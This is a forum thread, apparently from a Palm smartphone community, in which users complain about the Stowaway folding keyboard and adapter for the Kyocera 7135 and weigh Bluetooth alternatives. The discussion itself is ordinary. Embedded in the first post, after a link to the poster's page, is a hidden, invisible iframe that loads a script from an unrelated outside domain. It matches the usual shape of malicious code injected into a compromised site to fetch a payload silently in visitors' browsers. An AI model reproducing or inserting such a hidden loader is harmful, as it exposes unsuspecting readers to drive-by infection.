+ Reply to Thread
Page 1 of 5 1 2 3 4 5 LastLast

Whats bad about the 7135 Stowaway keyboard

I recently purchased the Stowaway portable keyboard from the Kyocera wireless store. I was impressed by the claim that the keyboard will work during data calls, a major drawback of the 6035. First, the good news: The keyboard *does* function well with 7135, including flawless text entry during a data call, as advertised. I tested it only with Verizon's qnc data service; I don't have Express Network (yet).

However, the adapter that sits in between the keyboard and the 7135 is very poorly designed.

Because of this, the whole setup had a huge footprint. The keyboard doesn't come with any kind of stand for the 7135. You have to either lay the phone flat or create your own method of propping it up. This may be a tricky proposition, and one that I wasn't prepared to make when paying $80+ for a portable keyboard. I don't want to think about how awkward using the keyboard will be on an Amtrak or airplane tray table.

I'm seriously thinking about returning the keyboard, in the hope that maybe they'll rethink this setup and offer a keyboard with some kind of prop to hold the phone up, similar to other Palm devices. The 7135 is great in function, but very poor in form, to the point of not really being of much use in very tight situations... it's too bad, because I really wanted to like this product.

For other pics of my new 7135, check out my 7135 geek page .<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

http://mikewren.com

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    Thanks for the pics! Out of curiousity, would you please post a close-up picture of the top of the keyboard, where the adapter connects to it? Is it just an extension cable, and if so, can you simply plug the 7135 directly into the keyboard?
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

Mike -

It looks like the Stowaway keyboard is exactly the same as the one I have for my Palm III. Is the only thing new here the adaptor that connects the old Stowaway keyboard to the new 7135?

BTW, loved your geek page.

- Mark

I just purchased the keyboard as well and also am less than thrilled with it. I'm thinking about returning it and waiting for Kyocera to license the new Stowaway XT "Ultra Thin" design from Think Outside: Ultra-Thin Keyboard

Andrew

I really like the pictures, on your site.

Please keep us up to date on any additional pictures that you post.

Originally posted by dreamwave6
    I just purchased the keyboard as well and also am less than thrilled with it. I'm thinking about returning it and waiting for Kyocera to license the new Stowaway XT "Ultra Thin" design from Think Outside: Ultra-Thin Keyboard

Andrew
    Good idea--- have you bombard Think Outside & Kyocera with emails about this yet?
    iPhone therefore iAm.

Originally posted by KB2PMD
    Thanks for the pics! Out of curiousity, would you please post a close-up picture of the top of the keyboard, where the adapter connects to it? Is it just an extension cable, and if so, can you simply plug the 7135 directly into the keyboard?
    Greetings KB2PMD from N2QDK... I haven't even thought about ham radio-related stuff in many years... are there any decent palm apps for hams, besides the obvious QSO logging solutions?

Anyway, your request is my pleasure:

This is the adapter and the keyboard connection. The palm will *not* plug directly into the Stowaway keyboard, hence the need for the adapter.

Here's another shot of it. The more I think about how annoying the keyboard is to use, the more annoyed I get and more tempted I am to return it. I mean c'mon, the phone just lays there...

http://mikewren.com

This keyboard is no good

I was equally excited to pick up the keyboard and have found it very difficult to use. I have tried it at home on a large table and still found it hard to use. My intention was to type while traveling on an airplane and I don't think this is going to work. I think I got ripped off.

Possible Keyboard for 7135

This might be an interesting keyboard solution for the 7135...

http://www.mobilemag.com/content/100/104/C1363/

Don't know how good it works or feels but it's a cool concept...
    And bluetooth enabled even...

One reason for purchasing the 7135 (mine is arriving tmrw) is as a laptop replacement for trips where all I need is email and perhaps some web access. So the keyboard is vital for me.

Is there a workaround for this obvious problem? Anyone figured one out yet?

Thanks!

Re: Possible Keyboard for 7135

Originally posted by mciccone
    This might be an interesting keyboard solution for the 7135...

http://www.mobilemag.com/content/100/104/C1363/

Don't know how good it works or feels but it's a cool concept...
    And bluetooth enabled even...
    Maybe I'm missing something, but why wouldn't this work with the bluetooth SD card? Sounds pretty cool to me if it'd work.

The keyboard/cable kit is a worthwhile solution. Think Outside had some trouble working with Kyocera on the 6035 keyboard, which delayed it. Some users also complained about the bulk of the cradle. This time, the keyboard and cable for the 7135 were available before the phone was out and there is no cradle needed. The design also allows exisiting 6035 keyboard users to keep their current keyboard and buy only the cable and driver. It's a great compromise, but if you really want to wait for something else you have that option.

The Bluetooth keyboard sounds really cool, and like the perfect form factor (i.e., no cable). Has anyone with the phone purchased a Bluetooth card and used it with something? The only downside I can see to this keyboard is that you would not be able to use other SD cards at the same time. For example, you couldn't listen to your MP3 collection, or edit a very large document, stored on an SD card.

Also, about the Kyocera keyboard: Is the cable at all flexible? I.e., could you get the phone and keyboard to sit closer together if you had a way of holding the phone there? What I am wondering is whether some "phone holder" could be used to seat the phone next to the keyboard, creating a smaller footprint, or whether the cable is too stiff for that. Perhaps something somewhat sturdier than that little beach chair that they sell on the web site, but something to provide support for it.

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar

Re: Re: Possible Keyboard for 7135

Originally posted by satyric
    Maybe I'm missing something, but why wouldn't this work with the bluetooth SD card? Sounds pretty cool to me if it'd work.
    In order for the keyboard to function properly, you'd need a device driver for it, especially considering you'd want to map some of the keys to particular functions (e.g. apps, phone book, etc.)
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

Registered User All-Purpose Guru's Avatar

7135 keyboard connector

Folks,

Is the phone side of the 7135 keyboard cable the same as the 6035? As in, it would work in the 6035?

Has anyone tried the 7135 keyboard in the 6035?

Inquiring minds want to know,

--apg

There is an "upgrade kit" on the kyocera accessories store, a cable adaptor to allow the 7135 keyboard to be used with a 6035. $30. I'm curious too if anyone with a 6035 has tried this, as I'm thinking of a used 6035 to tide me over, but would get this as the keyboard....

Edit: I wrote this backwards. The adaptor attaches to the old Kyocera keyboard for the 6035, and allows it to work with a 7135. My apologies.

Administrator
    its the same board that thinkoutside made available for use on the 6035... this just has drivers that wil allow you to use it while online...

I'm gonna go against the flow here and say that despite the large footprint, I am very much looking forward to using my 7135 foldable keyboard. It's sitting here right next to me, too bad I don't have the phone yet.

But I too don't know why they couldn't have made the cable more flexible.
    ~'kito
    pdaPhoneHome Moderator

I have tried it and I am disappointed. But I will hang in there before sending the keyboard back. I would like to use it on planes and in meetings and I don't see using it on a tray table as it is right now.

Originally posted by marctronixx
    its the same board that thinkoutside made available for use on the 6035... this just has drivers that wil allow you to use it while online...
    So you need a different driver to be able to use it online? This scares me...

I don't have a thinkoutside, but another KB made for Palm III (connected using the syncable adapter). I really hope it works in data calls with my existing driver (KeyZ hack).